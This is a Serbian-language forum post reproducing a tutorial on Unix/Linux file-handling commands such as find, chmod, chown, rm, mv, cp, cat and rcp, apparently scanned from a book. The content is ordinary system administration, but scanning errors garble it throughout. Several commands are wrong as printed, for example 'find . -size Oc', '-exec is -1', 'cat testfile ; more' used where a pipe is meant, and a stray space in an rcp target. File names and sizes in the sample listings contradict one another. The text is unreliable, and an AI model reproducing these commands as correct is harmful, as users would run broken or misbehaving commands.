    -operator -o operator da se traze fajlovi koji zadovoljavaju jedan, ili drugi uslov
    -!operator da se traze fajlovi koji ne zadovoljavaju navedeni uslov.

    Primeri
    Pretpostavimo da se u tekucem direktorijumu nalaze sledeci fajlovi:

    ls -al
    total 64
    drwxrwx-- 3 testuser author 3072 Nov 25 00:41 .
    drwxr-xr-x 36 root system 2048 Nov 23 19:51 ..
    -rw-r--r-- 1 testuser author 0 Nov 24 14:54 .dota
    -rw 1 testuser author 10 Nov 24 17:36 testl
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -r-x 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 15647 Nov 24 18:32 tests

    Na sledeci nain mozete da izvrsite najjednostavniji oblik komande find, da biste dobili listu svih fajlova koji se nalaze u tekucem direktorijumu i njego-vim poddirektorijumima:

    find -print

    ./tests
    ./testl
    ./test3
    ./test4
    ./test2
    ./test2/test2l
    ./test2/test22
    ./.dotl

    Ako hocete da trazite sve fajlove iz tekuceg direktorijuma koji su u poslednja 24 sata bili modifikovani, upotrebite operator -mtime na sledeci nacin:
    find . -mtime 0 -print
    /test5
    /testl
    /test3
    /test4
    /test2
    ./test2/test2l
    ./test2/test22
    ./.dotl

    Da biste pronasli fajl cija dozvola iznosi 600 (samo vlasnik ima dozvolu citanja i pisanja), pozovite komandu, u kojoj se koristi -perm operator:

    find . -perm 600 -print
    ./testl

    U ovom slucaju prikazuje se samo fajl cija dozvola iznosi tacno 600. Medutim, ako hocete da traite fajl za koji vlasnik ima dozvolu citanja i pisanja, pozovite komandu u kojoj se nalazi - (crta) ispred 600:
    find . -perm -600 -print

    ./test5
    ./testl
    ./test4
    ./test2
    ./test2/test2l
    ./test2/test22
    ./.dotl

    Ukoliko ste zainteresovani samo za pretrazivanje direktorijuma, pozovite komandu, u kojoj se koristi operator -type:

    find . -type d -print
    ./test2

    Da biste dobili vise informacija o fajlovima nadenim prilikom pretrazivanja, pozovite komandu, u kojoj se koristi operator -ls:
    find . -ls
    2 4 drwxrwx--- 3 settlea eod 3072 Nov 25 01:11 .
    16 16 -rw-r--r-- 1 testuser author 647 Nov 24 18:32 ./test5
    18 4 -rw 1 testuser author 10 Nov 24 17:36 ./testl
    19 0 -r-x 1 testuser author 0 Nov 24 14:58 ./test3
    20 0 -rw-r--r-- 1 testuser author 0 Nov 24 17:33 ./test4
    67584 4 drwxr-xr-x 2 testuser author 512 Nov 24 17:32 ./test2
    67585 0 -rw-r--r-- 1 testuser author 0 Nov 24 17:45 ./test2/test2l
    67586 0 -rw-r--r-- 1 testuser author 0 Nov 24 14:58 ./test2/test22
    22 0 -rw-r--r-- 1 testuser author 0 Nov 24 14:54 ./.dotl

    Da biste pronasli sve fajlove cije ime pocinje sa test, pozovite komandu, u kojoj se koristi operator -name:
    find . -name 'test** -print
    ./test5
    /testl
    /test3
    /test4
    /test2
    ./test2/test2l
    ./test2/test22

    Kao sto mozete da vidite, komanda find presla je preko poddirektorijuma test2, da bi nasla imena koja se u njemu nalaze. Ukoliko hocete da ogranicite pretrazivanje samo na tekuci direktorijum, izostavljajuci poddirektorijume, pozovite na izvrsavanje komandu, u kojoj se koristi operator -prune:

    find . -name "test*" -prune -print
    ./test5
    ./testl
    ./test3
    ./test4
    ./test2
    Da biste u tekucem direktorijumu pronali listu fajlova koji su "mladi" od fajla test1, pozovite komandu, u kojoj se koristi operator -newer:

    find . -newer tests -print
    ./test5
    ./test2/test2l

    S druge strane, ako hocete da pronadete listu fajlova koji su "stariji" od fajla test1, pozovite komandu, u kojoj se koristi operator ! za negaciju, u kombinaciji sa operatorom -newer:
    find . ! -newer test1 -print

    ./test3
    ./test4
    ./test2
    ./test2/test22
    ./.dotl

    Ukoliko hocete da dobijete listu svih fajlova cija velicina iznosi tacno 10 bajtova, pozovite komandu, u kojoj se koristi operator -size:

    find . -size 10c -print
    ./test1

    Ako hocete da kreirate listu fajlova koji su manji od 10 bajtova, pozovite na izvrsavanje komandu (ona je identicna prethodnoj, izuzev sto se ispred broja 10 nalazi crta):
    find . -size -10c -print
    ./test3
    ./test4
    ./test2/test2l
    ./test2/test22
    ./.dotl

    Ako hocete da dobijete listu svih fajlova Cija je velicina jednaka nuli, na sledeci nain pozovite komandu find, u kojoj se koristi parametar -exec:
    find . -size Oc -exec ls -1 {} ;
    -r-x 1 testuser author 0 Nov 24 14:58 ./test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 ./test4
    -rw-r--r-- 1 testuser author 0 Nov 24 17:45 ./test2/test2l
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 ./test2/test22
    -rw-r--r-- 1 testuser author 0 Nov 24 14:54 ./.dotl

    Ako hocete da uklonite sve fajlove cija je velicina jednaka nuli, ah, pri tom, hocete da pre brisanja povrdite brisanje, pozovite komandu, u kojoj se nalazi operator -ok:
    find . -size Oc -ok rm {} ;
    rm ... ./test3 > (yes)? y
    rm ... ./test4 > (yes)? n
    rm ... ./test2/test2l > (yes)? y
    rm ... ./test2/test22 > (yes)? y
    rm ... ./.dot1 > (yes)? y

    Ovde ste odluciti da ne uklonite fajl test4.
    U svim primerima koje ste do sada videli kordstio se po jedan operator. Moguce je pozvati na izvrsavanje find komandu, sa zadatim kompleksnim uslovima za pretrazivanje, koji u sebi sadrze vise operatora medusobno kombinovanih pomocu
    uslova'ili' (or) ili 'i' (and). Ako hocete da dobijete informacije o svim fajlovima cije ime pocinje sa test i Cija je velicina jednaka nuli, pozovite komandu:

    find . -name 'test*' -size Oc -print
    ./test3
    ./test4
    ./test2/test2l
    ./test2/test22

    U ovom primeru kombinovali smo dva razlicita operatora. Isti operator moze da se koristi vise puta u kombinaciji sa and, ili or operatorima. Ako hocete da trazite sve fajlove koji se nalaze u tekucem direktorijumu, cija je velicina veca od nula i manja od 50 bajtova, pri cemu treba da bude zadovoljen i uslov da njihovo ime pocinje sa test,pozovite komandu:

    find . -size +0c -a -size -50c -name 'test*' -exec is -1 {} ;
    -rw 1 testuser author 10 Nov 24 17:36 ./testl


    file
    Komanda file moze da se koristi za odredivanje tipa navedenog fajla. U stvari, komanda file cita fajl i izvrsava niz testova na osnovu kojih odreduje njegov tip. Posle toga ova komanda izlaz prikazuje kao standardni izlaz.
    Ukoliko je to ASCII fajl, komanda file ispituje njegovih prvih 512 bajtova i pokusava da odredi o kom se jeziku radi. Ukoliko te, nije ASCII fajl, komanda file dalje pokusava da ustanovi da li se radi o fajlu sa binarnim podacima, ili o tekstualnom fajlu, koji sadrzi prosirene karaktere.
    Ako argument File specificira fajl koji predstavlja izvrsni fajl, ili objektni modul, pri cemu je njegov broj verzije veci od 0, komanda file prikazuje oznaku verzije.Komanda file koristi fajl /etc/magic da identifikuje fajlove koji imaju neku vrstu magicnog broja, odnosno svaki fajl koji sadrzi numericku konstantu, iii konstantu koja se sastoji iz niza karaktera i oznacava tip.

    Primer
    Ako u tekucem direktorijumu imate fajl po imenu letter, u kome se nalazi pismo Vasem prijatelju, izvrsavanjem sledece komande

    file letter
    dobija se rezultat:
    letter: commands text

    Ako imate fajl po imenu prog, koji predstavlja izvrsni program, pri cemu radite na IBM RISC 6000 AIX verziji 3.1, tada ce rezultat izvrsavanja komande

    file prog
    biti sledeci:
    prog: executable (RISC System/6000 v3.1)

    Ukoliko se nalazite u direktorijumu /dev, u kome se nalaze svi posebni fajlovi, izvrsavanjem komande

    file hdl
    za fajl hdi (oval fajl je disk na kome je definisan fajl sistem), dobija se sledeci rezultat
    hdl: block special

    Izvor: Tim 1o1
    IP sačuvana
    social share
    Pogledaj profil WWW
     
    Prijava na forum:
    Ime:
    Lozinka:
    Zelim biti prijavljen:
    Trajanje:
    Registruj nalog:
    Ime:
    Lozinka:
    Ponovi Lozinku:
    E-mail:
    Supervizor foruma
    Legenda foruma


    Violence solves everything

    Zodijak Aquarius
    Pol Muškarac
    Poruke 33826
    Zastava Srbija
    OS
    Windows XP
    Browser
    Mozilla K-Meleon 1.02
    mob
    LG Nexus 5
    Komande za rukovanjem fajlovima u Unixu/Linuxu





    Komande za rukovanje fajiovima

    Ovde cemo opisati nekoliko komandi, koje mogu da se koriste za manipulisanje atributima jednog, ili vise fajlova, a takode cemo se baviti i kopiranjem i premestanjem fajlova sa jednog mesta na drugo. Medu ovim atributima, kojima je moguce rukovati, nalaze se vreme modifikacije fajla, dozvole i drugo.


    touch

    Komanda touch moze da se koristi u razlicite svrhe, u zavisnosti od toga da li fajl vec postoji, ili ne postoji. Ukoliko fajl ne postoji, komanda touch ce ga kreirati, pod uslovom da imate dozvolu za pisanje u direktorijum. Ako je fajl vec prisutan, komanda touch menja vreme poslednje modifikacije fajla.


    Primeri
    Za kreiranje u tekucem direktorijumu fajia, po imenu testfile, izvrsite komandu:
    touch testfile
    Za kreiranje fajla testfile u /u/testuser/testdir, izvrsite komandu:
    touch /u/testuser/testdir/testfile


    chmod

    Mozda ce biti potrebno da modifikujete dozvolu koja se odnosi na rad sa direktorijumom, ili fajlovima, bilo da ih zastitite, ili ucinite pristupacnim drugima. Mozete da koristite komandu chmod i pomocu nje modifikujete dozvole za rad sa fajiovima i direktorijumima, koje se u UNIX-u specificiraju kao oktalni brojevi (0 do 7). Dozvola za fajl, ili direktorijum moze da se specificira za sledece entitete:
    -vlasnika - korisnika koji je kreirao fajl
    -grupu - grupu kojoj vlasnik pripada
    -svet, ili ostale - korisnike od kojih ni jedan nije vlasnik i korisnike iz grupe kojoj vlasnik pripada.
    Za svaki od pomenutih entiteta specificira se jedan oktalni broj, koji odreduje dozvolu.
    Dozvola za vlasnika, grupu i svet izracunava se na osnovu tri bita pridruzena dozvolama za citanje, pisanje i izvrsavanje fajla. To znaci da ce bit za citanje imati vrednost jedan, ukoliko se dodeljuje dozvola za citanje, bit za pisanje imace vrednost jedan, ako se dodeljuje dozvola za pisanje, a bit za izvsgavanje imace vrednost jedan, ako se dodeljuje dozvola za izsrgavanje.
    Trebalo bi da imate na umu da bit za izvrsavanje ne funkcionise na isti nacin kada se radi o direktorijumima. Dozvola za izvodenje koja se odnosi na direktorijum - odreduje da li je dozvoljen pristup tom direktorijumu.
    Kombinacija ova tri bita izrazava se kao oktalni broj - pomocu njega se odreduje dozvola. Bit za citanje ima tezinu 4, bit za pisanje ima tezinu 2, a bit koji se odnosi na izvrsavanje ima tezinu 1. Vrednost dozvole izracunava se na sledeci nacin:

    (4 * value of read bit) + (2 * value of write bit) + (1 * value of execute bit)

    Vrednost dozvole moze da varira od 0 (nije dozvoljeno citanje, pisanje i izvrgavanje) do 7 (dozvoljeno je citanje, pisanje i izvrsavanje).
    Na primer, ako hocete da dozvolite citanje i pisanje, ali ne i izvrsavanje, tada je vrednost koja treba da se upotrebi:

    (4 * 1) + (2 * 1) + (1 * 0) = 6.

    Trebalo bi da imate u vidu da dozvola za izvrsavanje koja se odnosi na direktorijum podrazumeva da moze da se pristupi direktorijumu. Drugim recima, dozvoljeno je izvodenje odredenih operacija nad fajlovima u tom direktorijumu.
    Ako je odredenom direktorijumu pridodata dozvola za pisanje, korisnik ce moci da cita, pise, brise i izvrsava fajlove koji se nalaze u tom direktorijumu, bez obzira na to kakve dozvole postoje za individualne fajlove.
    Pomocu chmod komande specificiraju se nove dozvole za odgovarajuci fajl i direktorijum. Nova dozvola moze da se specificira na jedan od sledeca dva nacina:
    -kao trocifren numericki oktalni kod
    -na simbolican nacin.

    Primer
    Pretpostavimo da hocete da za testfile vaze sledece dozvole: vlasnik moze da cita, pise i izvrsava, grupa moze samo da cita, a ostali samo da izvrsavaju. U tom s1ucaju, morate da izvrsite komandu:

    chmod 741 testfile

    Kada se koristi simbolicki nacin, potrebno je da se navedu sledece informacije:
    -cije (vlasnika, grupe, ili ostalih) dozvole hocete da promenite
    -koju operaciju: + (dodavanje), - (oduzimanje), ili = (jednako) hocete da izvedete nad dozvolama
    -koju dozvolu menjate.
    Ako hocete dozvolu za testfile (ciji ste Vi vlasnik u tekucem direktorijumu) da postavite tako da samo Vi i korisnici iz Vase grupe mozete da citate i pisete u taj fajl, pozovite komandu u kojoj koristite apsolutnu dozvolu:
    chmod 660 testfile
    Ukoliko hocete grupi da dodate dozvolu za pisanje u testfile, koji se nalazi u tekucem direktorijumu (pod pretpostavkom da vrednost dozvole za testfile sada iznosi 741), izvrsite komandu:
    chmod g+w testfile
    Na slican nacin, ako hocete ostalima da opozovete dozvolu za citanje fajla testfile, koji se nalazi u tekucem direktorijumu, pozovite komandu:
    chmod o-r testfile
    Ukoliko hocete svetu (ostalima) da za rad sa fajlom testfile, koji se nalazi u tekucem direktorijumu, dodelite iste dozvole koje ima grupa, pozovite komandu:
    chmod o=g testfile
    Napomena
    Izmene ovih dozvola nece se odraziti na root korisnika. Korisnik root ima pristup svim fajlovima i direktorijumima, nezavisno od dozvola koja ste im dodelili.


    chgrp

    Ako hocete da promenite grupu kojoj fajl pripada, upotrebite chgrp komandu. Nova grupa mora da bude jedna od grupa kojoj vlasnik pripada. To znaci da ona mora da bude ili primarna, ili jedna od sekundarnih grupa vlasnika.
    Primer!
    Pretpostavimo da je korisnik testuser vlasnik fajla testfile, pri cemu je grupa kojoj fajl pripada staff. Takode, pretpostavimo da testuser pripada grupama staff i devt. Da biste promenili vlasnika fajla testfile sa staff na devt, izvrsite komandu:
    chgrp devt testfile

    chown

    U slucaju da hocete da promenite vlasnika fajla ili direktorijuma, upotrebite chown komandu.

    Primeri
    Ako je korisnik testuser vlasnik fajla testfile, da bi se promenilo vlasnistvo nad fajlom, tako da njegov vlasnik postane korisnik simke, morate da pozovete komandu:
    chown simke testfile

    rm

    Kada zavrsite koriscenje fajla koji vise nemate nameru da koristite, zelecete da ga uklonite i tako dobijete na raspolaganje prostor na disku gde je bio taj fajl. Komanda rm omogucava Vam da fajlove trajno uklonite sa diska. Ukoliko ime koje se navede predstavlja poslednji link na fajl, fajl se brise. Da bi se izbrisao iz direktorijuma, nije potrebno da imate dozvolu za citanje, ili pisanje u fajl, vec dozvolu za pisanje u direktorijum u kome se nalazi. Za uklanjanje fajlova obicno se upotrebljava komanda rm. U njoj moze da se koristi poseban indikator -r, koji sluzi za rekurzivno uklanjanje fajlova iz direktorijuma, ukljucujuci i direktorijum i poddirektorjume.
    Evo liste nekih indikatora koji mogu da se koriste sa rm komandom:
    -i za interaktivno uklanjanje fajlova
    -f za uklanjanje fajlova bez poruka; ovim se nece generisati poruke u slucajevima kada fajl ne postoji, iii kada nemate dozvolu da uklonite jedan, ili vise fajlova
    -r za rekurzivno uklanjanje fajlova iz direktorijuma i samih direktorijuma.

    Osnovna UNIX verzija rm komande ne trazi potvrdu prilikom uklanjanja fajlova. Zbog toga sa rm komandom treba pazljivo koristiti dzoker znake.

    Primeri
    Ako hocete da uklonite sve fajlove iz tekuceg direktorijuma koji pocinju sa test, pozovite komandu:
    rm test*
    Medutim, ako u kucanju napravite gresku i otkucate: rm test *
    uklonicete sve fajlove zbog znaka asterisk (*).

    Upozorenje
    Pazijivo koristite dzoker znake sa rm komandom. Pre nego sto uklonite fajl, provente sta radite. Kada se fajl ukloni, ne moze da se povrati.
    Takve greske cete izbeci ako koristite indikator -i, kojim se zahteva izvrsavanje rm komandi na interaktivan nacin. Kada se koristi ovaj nacin, sistem ce pre uklanjanja fajla od Vas traziti potvrdu. Samo ako potvrdite ovaj zahtev sa y, on ce ukloniti navedeni fajl. Ukoliko hocete, pomocu rm komande, indikatorom -i da uklonite fajlove testfilel i testfile2 iz tekuceg direktorijuma, odvijace se sledeci dijalog izmedu Vas i sistema:
    rm -i testfile*
    Remove file testfilel? y Remove file testfile2? y
    Ukoliko ne zelite da kao rezultat izvrsavanja rm komande dobijete bilo kakve poruke, sa komandom rm mozete da koristite indikator -f. Obicno ce komanda rm prikazati poruke o nepostojanju fajla, ako ne navedete njegovo ispravno ime. Medutim, upotreba indikatora -f prisiljava komandu da ne prikazuje bilo kakvu poruku. Ukoliko izvrsite komandu
    rm -f testfile
    fajl testfile ce biti izbrisan, ukoliko postoji. Ako ne postoji, nece biti preduzeta bilo kakva akcija. U oba slucaja necete dobiti poruku od rm komande. Isto tako, povratni kod komande rm -f uvek je 0 (nula).
    Indikator - r mozete da koristite za rekurzivno uklanjanje fajlova iz direktorijuma, a i za uklanjanje direktorijuma i poddirektorijuma. Ako u tekucem direktorijumu postoji direktorijum po imenu testdir, u kome se nalaze fajlovi testfilel i testfile2, da biste uklonili te fajlove i direktorijum testdir, pozovite komandu:
    rm -r testdir
    Preporucljivo je da u svom okruzenju za rm komandu postavite alias rm -i, tako da se pre svakog brisanja fajla od Vas trazi potvrda.
    Komanda rm na drukciji nacin obraduje fajlove, koji su linkovani hard linkom. Ako u svom tekucem direktorijumu imate testfilel i hocete da kreirate testfile2, koji je hard linkom linkovan na testfilel, izvrsite komandu:
    ln testfilel testfile2
    Ovim se, u stvari, kreiraju dva identicna fajla: testfilel i testfile2. Ako sada pozovete komandu
    ls -l testfile*
    dobicete sledeci rezultat:
    -rw-r--r-- 2 testuser staff 10 Nov 3 14:28 testfilel
    -rw-r--r-- 2 testuser staff 10 Nov 3 14:28 testfile2
    Ovde broj linkova iznosi 2 i za testfilel i za testfile2, zato Sto su linkovani hard linkom. Ako sada uklonite testfilel, koristeci na sledeci nacin rm komandu,
    rm testfilel
    bice izvedene dve aktivnosti - uklanjanje fajla testfilel i smanjenje broja linkova za fajl testfile2 sa 2 na 1. Ako sada ponovite ls komandu, dobicete sledeci prikaz
    rw-r--r-- 1 testuser staff 10 Nov 3 15:38 testfile2
    gde broj linkova za testfile2 sada iznosi 1.


    mv

    Ukoliko niste zadovoljni imenom fajla, mozda cete zeleti da ga promenite. Komanda mv Vam to omogucava. Pored toga, ona Vam pruza mogucnost da fajlove premestate iz jednog direktorijuma u drugi, ne menjajuci njihova imena, sto je ekvivalentno kopiranju fajlova iz izvornog direktorijuma u uputni direktorijum i njihovom uklanjanju iz izvornog direktorijuma. Mozete ovo da radite, ako reorganizujete svoje fajlove. Kada premestate fajlove, ili direktorijume, ciljni (target) direktorijum dobija dozvole koje se odnose na izvorni direktorijum, nezavisno od toga da li ciljni fajl, ili direktorijum vec postoje.
    Evo liste nekih indikatora koji mogu da se koriste sa mv komandom:
    - i za interaktivno premestanje fajlova, iii promenu njihovih imena.
    - f za premestanje fajlova, ili promenu njihovih imena, bez bilo kakvih poruka sistema. Ako koristite ovaj indikator, izostace prikazivanje poruka kada pokusate da promenite ime nepostojecem fajlu, ili kada nemate dozvolu da promenite ime fajlu.
    Komanda mv ima dva argumenta: prvi je izvorni fajl, ili ime direktorijuma, a drugi je uputni fajl, ili direktorijum. Medutim, ponasanje mv komande zavisice od toga da li postoji uputni fajl, ili direktorijum.
    Ako fajlove premestate u okviru istog fajl sistema, zadrzavaju se svi linkovi na druge fajlove. Ali ako ga premestate izvan granica fajl sistema, linkovi se nece sacuvati.

    Primeri
    Za promenu imena fajla u tekucem direktorijumu koristite komandu:
    mv source file dest file
    Ukoliko fajl dest file ne postoji, novi dest_file kreira se tako Sto se u njega kopira source_file i, potom, uklanja source_file. Ako dest_file postoji i Vi imate dozvolu za pisanje u njega, source file se kopira u dest file i, posle toga, uklanja. Ukoliko, medutim, takvu dozvolu nemate, komanda mv ne preduzima bilo kakvu akciju.
    Ako hocete source file da premestite iz tekuceg direktorijuma u direktorijum /u/testuser/targer_dir, ne menjajuci mu, pri tom, ime, pozovite jednu od sledecih komandi:
    mv source file /u/testuser/target_dir mv source file /u/testuser/target_dir/.
    Ukoliko u direktorijumu /u/testuser/target_dir vec postoji takav fajl, on ce biti prekriven.
    Da biste source_ file premestili iz tekuceg direktorijuma u direktorijum /u/testuser/target_dir, gde ce se nalaziti pod imenom target_file, pozovite komandu:
    mv source file /u/testuser/target_dir/target_file.
    Ako niste sigurni da li target_dir postoji, upotrebite indikator -i na sledeci nacin:
    mv -i source_file target_dir/target_file
    Ako fajl target_file postoji, sistem ce prikazati prompt poruku kojom ce se od Vas traziti da potvrdite zahtev za premestanje fajla.

    Ako se za ciljno (target) ime fajla upotrebi . (tacka), to oznacava da treba da se zadrzi izvorno ime fajla. Ovo je narocito korisno kada vise fajlova premestate u drugi direktorijum. Ako hocete da premestite u direktorijum /u/testuser/target_dir sve fajlove cije ime pocinje sa test, pozovite komandu:


    mv test* /u/testuser/target_dir/.
    Da bi se promenilo ime direktorijumu source_dir u /u/testuser/dest_dir, pozovite komandu:
    mv /u/testuser/source_dir /u/testuser/dest_dir
    Ukoliko dest_dir ne postoji, direktorijum /u/testuser/source_dir menja ime u /u/testuser/dest_dir. Ako /u/testuser/dest_dir postoji i Vi za njega imate dozvolu pisanja, svi fajlovi i poddirektorijumi, koji se nalaze u /u/testuser/source_dir, premestaju se u /u/testuser/dest_dir.

    cp

    Komanda cp moze da se koristi za pravljenje kopije sadrzaja jednog, ili vise izvornih fajlova, pod imenom navedenih ciljnih fajlova. Ukoliko ciljni fajl vec postoji, preko njega se prepisuje sadrzaj izvornog fajla. Ponasanje komande cp je razlicito, u zavisnosti od toga da li izvor i cilj predstavljaju fajlove, ili direktorijume.

    U sledecoj listi nalaze se neki indikatori koji mogu da se koriste sa cp komandom:
    - p da se zadrze datum i vreme modifikacije izvornog fajla i dozvole koje se na njega odnose
    - i za izvrsavanje copy komande na interaktivan nacin, tako da se, u slucaju da ciljni fajl postoji, trazi potvrda
    - h da se slede simbolicki linkovi
    - r da se fajlovi kopiraju u navedene direktorijume i pod-direktorijume; Posebni fajlovi, kao sto su linkovani fajlovi, tretiraju se na isti nain kao regularni fajlovi.

    Primeri
    Ako hocete da kopirate source_file u target_file u tekucem direktorijumu, mozete da izvrsite komandu cp u njenom najjednostavnijem obliku:


    cp source_file target_file
    Ako hocete da kopirate source_file u direktorijum /u/testuser/target_dir, zadrzavajuci, pri tom, ime fajla, pozovite komandu:
    cp source_file /u/testuser/target_dir/.
    Da biste kopirali sve fajlove koji se nalaze u /u/testuser/source_dir u direktorijum /u/testuser/target_dir, zadrzavajuci, pri tom, imena fajlova, njihovo vreme poslednje modifikacije i njihove dozvole, pozovite komandu:
    i
    cp -p /u/testuser/source_dir/* /u/testuser/target_dir/.
    Ovim nece biti kopirani poddirektorijumi, ili fajlovi koji se nalaze u tim poddirektorijumima. Ako hocete da kopirate sve fajlove u nekom direktorijumu, a takode i poddirektorijume i fajlove u tim poddirektorijumima, zadrzavajuci, pri tom, datum i vreme poslednje modifikacije i dozvole za sve fajlove i poddirektorijume, upotrebite komandu:
    cp -r /u/testuser/source_dir /u/testuser/target_dir/.
    Ukoliko niste sigurni da li ciljni fajl vec postoji, upotrebite indikator -i. Sledeci dijalog odvijace se kada kopirate testfile iz tekuceg direktorijuma u direktorijum /u/testuser/testdir, pod pretpostavkom da testfile vec postoji u direktorijumu /u/testuser/testdir:
    cp -i testfile /u/testuser/testdir/. overwrite /u/testuser/testdir/testfile? y


    cat

    Videli ste da Vam cp komanda omogucava da jedan fajl kopirate u drugi, ah ne i da vise fajlova kopirate u isti fajl. Za povezivanje (concatenation) vise fajlova u jedan fajl koristite komandu cat. Ona, po defaultu, generise izlaz na standardni izlaz i preuzima ulaz sa standardnog ulaza. Komanda cat za argumente ima jedan, ili vise fajlova. Ovi fajlovi se povezuju po redosledu po kome se pojavljuju u listi argumenata.
    U sledeéoj listi nalaze se neki od indikatora koji mogu da se koriste sa cat komandom.
    - b da se uklone brojevi redova iz praznih redova, kada se koristi indikator -n
    - e da se prikaze $ (dolarski znak) na kraju svakog reda, kada se specificira indikator -v
    - n da svakom od redova koji se prikazuju u izlazu prethodi broj reda, pri cemu su redovi sekvencijalno numerisani, pocevsi od 1
    - q da se izostavi prikazivanje poruka kada komanda cat ustanovi da ne moze da pronade jedan ulazni ili vise ulaznih fajlova
    - v da se karakteri u fajlu, koje nije moguce ispisrti, prikazu kao karakteri koje je moguce ispisati.

    Upozorenje
    Ako konstite operator za preusmerenje outputa (>) da preusmerite standardni output cat komande, vodite racuna da za ime output fajla ne navedete jedno od imena ulaznih fajlova. Ukoliko to uradite, ulazni fajl ce biti prekriven. Neke verzije UNIX-a daju poruku o gresci, kada pokusate da pisete preko fajla.
    Kada preuzimate ulaz sa standardnog ulaza, trebalo bi da koristite Ctrl-d za oznacavanje kraja ulaza.

    Primer
    Mozete da kucate komandu cat u njenom najjednostavnijem obliku, sto bi trebalo da Vas stavi u mcd za unos (entry mode). U ovom nacinu mozete da unesete vise redova, iza kojih treba da se nalazi Ctrl-d za oznacavanje kraja. Komanda cat prikazaje upravo unete redove.
    cat
    This is test line 1
    This is test line 1
    This is test line 2
    This is test line 2
    Ctrl d
    Trebalo bi da imate na umu da komanda cat u gornjem slucaju ne prikazuje bilo
    kakav prompt.
    Ukoliko hocete da na svom terminalu prikazete fajl testfile, koji se nalazi u
    tekucem direktorijumu, pozovite komandu:
    cat testfile

    Ovo ce proizvesti sledeci izlaz:
    This is a test file
    This does not contain anything meaningful
    This is for demo only
    Trebalo bi da postupate pazljivo u slucaju da se radi o velikom fajlu. On ce na Vasem terminalu biti skrolovan i Vi cete videti samo poslednjih nekoliko redova. Ovaj problem mozete da prevazidete ako postavite izlaz na komandu more, ili komandu pg, na sledeci nacin:
    cat testfile ; more
    Da biste za prikazivanje na terminalu povezali vise fajlova, upotrebite komandu:
    cat testfile1 testfile2 testfile3
    Ukoliko hocete da ove fajlove povezete u fajl po imenu testfile, na sledeci nacin upotrebite operator > za preusmerenje:
    cat testfilel testfile2 testfile2 > testfile
    Ako fajl testfile vec postoji, on biva prekriven povezanim fajlovima testfile1, testfile2 i testfile3. Ukoliko testfile postoji i Vi hodete da se povezivanje izvrsi na kraju postojedeg fajla, umesto operatora za preusmerenje >, morate da upotrebite » (dva uzastopna znaka'vece od') na slededi nacin:
    cat testfilel testfile2 testfile2 » testfile
    Ako pokusate da povezete neki fajl, ili vise fajlova, pri cemu jedan, ili vise fajlova od onih koje ste naveli ne postoji, cat ce povezati sve raspolozive i na kraju generisati poruku o nepostojedim fajlovima. Ukoliko ste pokusali da u fajlu testfile, koji se nalazi u tekucem direktorijumu povezete fajlove testfilel i testfile2 i, pri tom, ste u slededoj komandi, umesto testfile pogresno otkucali testfile
    cat testfilel testfile2 > testfile
    dobicete poruku slicnu sledecoj; pri cemu ce se u fajlu testfile nalaziti samo sadrzaj fajla testfilel:
    cat: cannot open testfile2
    Ako koristite -q indikator, necete dobiti poruku o gresci.
    Ukoliko u tekucem direktorijumu imate fajl testfile, u kome se nalaze sledeci redovi (poslednji red sadrzi specijalne karaktere), cat ce prikazati sledece:
    This is a test file
    This file does not contain anything meaningful
    This file is for demo only
    -F-F-F-F-F
    Ukoliko izvrsite cat komandu -n indikatorom, cat ce prikazati numerisane redove, ali ce poslednji red, u kome se nalaze specijalni karakteri, biti prikazan kao prazan:
    cat -n testfile
    1 This is a test file
    2
    3 This file does not contain anything meaningful
    4 This is for demo only
    5
    Ako hocete da budete sigurni da prikazani prazan red zaista ne sadrzi druge karaktere, osim onih koji ne mogu da se prikazu, sa cat komandom upotrebite -v indikator. Ovim se postize da se karakteri koje nije moguce ispisati prikazuju kao karakteri koje je moguce ispisati:
    cat -v testfile
    This is a test file
    This file does not contain anything meaningful
    This is for demo only
    -F-F-F-F-F


    rcp

    Do sada ste videli odreden broj komandi za premestanje, ili kopiranje fajlova u razlicite direktorijume, koji se nalaze na lokalnom hostu. Ako je potrebno da kopirate fajlove sa jednog na drugi host, moze da se koristi rcp komanda. Nju mozete da izvrsite na lokalnom hostu, da biste kopirali fajlove sa lokalnog na udaljeni host, ili sa jednog udaljenog hosta na drugi.
    Imenu fajla na udaljenom hostu prethodi ID udaljenog hosta na sledeci nacin: hostname: /dirname/filename. Dve tacke (Smiley koriste se za razdvajanje imena hosta i fajla.
    Takode je moguce da se na udaljenom hostu navede ime korisnika kao user - name@hostname: /dirname/filename. At-znak (@) koristi se da razdvoji imena korisnika i ime hosta. Medutim, ime korisnika je opciono. Ukoliko se ne specificira, ime korisnika na udaljenom isto je kao ime korisnika na lokalnom hostu.
    Ako izvorni, ili ciljni fajl ne specificiraju ime hosta, rcp komanda ponasa se kao cp komanda.
    Ukoliko ime fajla na udaljenom hostu nije puno kvalifikovano ime, koje pocinje root direktorijumom, pretpostavlja se da ime fajla, ili direktorijuma pocinje home direktorijumom udaljenog korisnika.
    Ako fajlovi ne postoje na udaljenom hostu, oni se kreiraju tako da dobiju default dozvolu udaljenog korisnika. Ukoliko ovi fajlovi vec postoje na udaljenom hostu, ostaju da vaze dozvole tih ciljnih fajlova.

    Slicno komandi cp, i komandu rcp mozete da koristite za kopiranje direktorijuma i fajlova u direktorijumima.

    U sledecoj listi navedeni su neki od indikatora koji mogu da se koriste sa komandom rcp:
    - p za kreiranje ciljnog fajla, sa datumom i vremenom modifikacije izvornog fajla i njegovom dozvolom
    - r za rekurzivno kopiranje fajlova kada se kopiraju direktorijuma.

    Primer
    Ako hocete da kopirate testfile iz tekuceg direktorijuma u testfile u direktorijumu testdir, koji se nalazi u home direktorijumu na udaljenom hostu, cije je ime otherhost, izvrsite komandu:
    rcp testfile otherhost:testdir/testfile
    Ako je ime korisnika na lokalnom hostu testuser, ova komanda ce pretpostaviti da je i ime korisnika na udaljenom hostu testuser ne postoji na udaljenom hostu i ako morate za korsnika na udaljenomenom hostu da koristite ime newtestuser, izvrsite komandu:
    rcp testfile newtestuser@otherhost:testdir/testfile
    Ako morate sa udaljenog hosta otherhostl da prenesete fajl testfile na drugi udaljeni host otherhost2, i, pri tom, hocete da se sacuvaju datum i vreme modifikacije i dozvola, izvrsite komandu:
    rcp -p testuserl@otherhostl :testfile testuser2@otherhost2:testfile
